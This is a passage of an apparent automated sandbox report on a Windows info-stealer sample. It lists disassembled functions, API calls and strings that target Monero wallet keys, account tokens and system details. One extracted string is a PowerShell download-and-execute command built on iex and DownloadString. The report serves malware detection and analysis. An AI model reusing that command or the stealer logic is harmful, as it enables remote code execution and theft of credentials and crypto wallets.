                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: 62625943d363ee6e31703ae6accde4d89468c54dbeceeff88ba32130975d4149
                  • Instruction ID: 279ca1c01bbac6eeb03b45b9ec91b6682104a8360980688e1191dfdb3785a79d
                  • Opcode Fuzzy Hash: 62625943d363ee6e31703ae6accde4d89468c54dbeceeff88ba32130975d4149
                  • Instruction Fuzzy Hash: 6661FCB5D441589BDB24DB50DC45BD9B7F8BF54300F0081E9E689A6281DF706BC9CFA1
                  Function 00B0BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  • lstrlen.KERNEL32(00000000), ref: 00B0BC9F
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00B0BCCD
                  • lstrlen.KERNEL32(00000000), ref: 00B0BDA5
                  • lstrlen.KERNEL32(00000000), ref: 00B0BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 50fb32668b001e3520d371e7d12f1a4e9283136ac7e01440264ee1b8539ee953
                  • Instruction ID: 89e172662b3309d876835808e5f204053336238e17134f0c7c57685b4040d54e
                  • Opcode Fuzzy Hash: 50fb32668b001e3520d371e7d12f1a4e9283136ac7e01440264ee1b8539ee953
                  • Instruction Fuzzy Hash: CCB17371911108ABDB04FBA4DD96EEE73BDAF14310F804598F506B6191EF347E89CB62
                  Function 00B16770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 54f1a6a180a99d4cea2501d31182fca80d55bbdc5db326654c6018d403409fae
                  • Instruction ID: a7d6f33d6f6bc961b6540a61567b043b5c6e34846e14cbde2d1776904d64f1cf
                  • Opcode Fuzzy Hash: 54f1a6a180a99d4cea2501d31182fca80d55bbdc5db326654c6018d403409fae
                  • Instruction Fuzzy Hash: 50F03A34984309EFE3549FE8A90976C7B70FB06702F040199F709C63D0DA704E419BE6
                  Function 00B04FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B04FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B04FD1
                  • InternetOpenA.WININET(00B20DDF,00000000,00000000,00000000,00000000), ref: 00B04FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B05011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B05041
                  • InternetCloseHandle.WININET(?), ref: 00B050B9
                  • InternetCloseHandle.WININET(?), ref: 00B050C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 367745569bbe20eaa8d75b55cdf8c21bc4246cd5b55550b43126985601f653f6
                  • Instruction ID: 535a3180619de73812b5cda365de7a27e886d9a0ac734eeef574cae12c782cab
                  • Opcode Fuzzy Hash: 367745569bbe20eaa8d75b55cdf8c21bc4246cd5b55550b43126985601f653f6
                  • Instruction Fuzzy Hash: 0C31F8B4A40218ABDB20CF54DC85BDDB7B4EB48704F5081D9FA09A7281D7706EC58FA9
                  Function 00B183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B18426
                  • wsprintfA.USER32 ref: 00B18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B18499
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,011FD9D0,00000000,000F003F,?,00000400), ref: 00B184EC
                  • lstrlen.KERNEL32(?), ref: 00B18501
                  • RegQueryValueExA.ADVAPI32(00000000,011FDAF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B20B34), ref: 00B18599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B18608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: fb42f9997921626160cdef0b7e13227dbb6f77705401a5ce0356bc8bdb3a1698
                  • Instruction ID: b505994039278ddb52b37c9d7f5f3ea22ae54584441d0c8f6d5c5e48104eb98c
                  • Opcode Fuzzy Hash: fb42f9997921626160cdef0b7e13227dbb6f77705401a5ce0356bc8bdb3a1698
                  • Instruction Fuzzy Hash: 2D210775950228ABDB24DF54DC85FE9B3B8FB48700F40C1D9A609A6280DF716A86CFE4
                  Function 00B17690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B176A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B176AB
                  • RegOpenKeyExA.ADVAPI32(80000002,011EBD58,00000000,00020119,00000000), ref: 00B176DD
                  • RegQueryValueExA.ADVAPI32(00000000,011FDA78,00000000,00000000,?,000000FF), ref: 00B176FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B17708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: ffa047f1c3f9edce7c54ecce58b90aa449065822ad1121b7e58a097f247160e2
                  • Instruction ID: 5566263740d1f64dfca7b354a26902d35376274a95f30e8ae8bbfca0a3f74168
                  • Opcode Fuzzy Hash: ffa047f1c3f9edce7c54ecce58b90aa449065822ad1121b7e58a097f247160e2
                  • Instruction Fuzzy Hash: 37014FB9A84308BBE700DFE8DC49FADB7BCEB49701F504095FA05D7291EA7499408F61
                  Function 00B17720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B1773B
                  • RegOpenKeyExA.ADVAPI32(80000002,011EBD58,00000000,00020119,00B176B9), ref: 00B1775B
                  • RegQueryValueExA.ADVAPI32(00B176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00B1777A
                  • RegCloseKey.ADVAPI32(00B176B9), ref: 00B17784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 2362138fcc114d510f870bb7cf9764d17523a1d6ee5fa71f841dfeab5f47cb6f
                  • Instruction ID: af845f25f709cf5e47ca8ced284c6d234048d78f208d4d925073267f9e553381
                  • Opcode Fuzzy Hash: 2362138fcc114d510f870bb7cf9764d17523a1d6ee5fa71f841dfeab5f47cb6f
                  • Instruction Fuzzy Hash: E00144B9A80308BBE710DFE4DC49FAEB7B8EB44700F104195FA05E7281DA7059408F61
                  Function 00B099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                  • LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 6b006f8de7fbb57348413e8ce0e6621b14dd417e5e988f3cfc4476a11dd86799
                  • Instruction ID: bb795f31f56cb89904ab634c03d6a119db740863afb8459f1b83c3b179e97adf
                  • Opcode Fuzzy Hash: 6b006f8de7fbb57348413e8ce0e6621b14dd417e5e988f3cfc4476a11dd86799
                  • Instruction Fuzzy Hash: C731F874A40209EFDB14CF94C985BAEBBF5FF49350F108198E911A7390D774A941CFA1
                  Function 00B14780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,011FDC28), ref: 00B147DB
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14801
                  • lstrcat.KERNEL32(?,?), ref: 00B14820
                  • lstrcat.KERNEL32(?,?), ref: 00B14834
                  • lstrcat.KERNEL32(?,011EB0E0), ref: 00B14847
                  • lstrcat.KERNEL32(?,?), ref: 00B1485B
                  • lstrcat.KERNEL32(?,011FD458), ref: 00B1486F
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B18D90: GetFileAttributesA.KERNEL32(00000000,?,00B01B54,?,?,00B2564C,?,?,00B20E1F), ref: 00B18D9F
                    • Part of subcall function 00B14570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B14580
                    • Part of subcall function 00B14570: RtlAllocateHeap.NTDLL(00000000), ref: 00B14587
                    • Part of subcall function 00B14570: wsprintfA.USER32 ref: 00B145A6
                    • Part of subcall function 00B14570: FindFirstFileA.KERNEL32(?,?), ref: 00B145BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 485dc7b5b113f3ddbcbb2cdaca246496093d2529866a7b319907c5d0d90ba4e3
                  • Instruction ID: b4ca9e36f27d1441d1a137a9153a433666fe4f5ae9e5f405e1a1c7f886adad22
                  • Opcode Fuzzy Hash: 485dc7b5b113f3ddbcbb2cdaca246496093d2529866a7b319907c5d0d90ba4e3
                  • Instruction Fuzzy Hash: 613171BA94030867DB14FBB0DC85EED73BCBB58700F8045D9B31996081EE74A7C98BA5
                  Function 00B12C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B12D85
                  Strings
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00B12D04
                  • ')", xrefs: 00B12CB3
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00B12CC4
                  • <, xrefs: 00B12D39
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
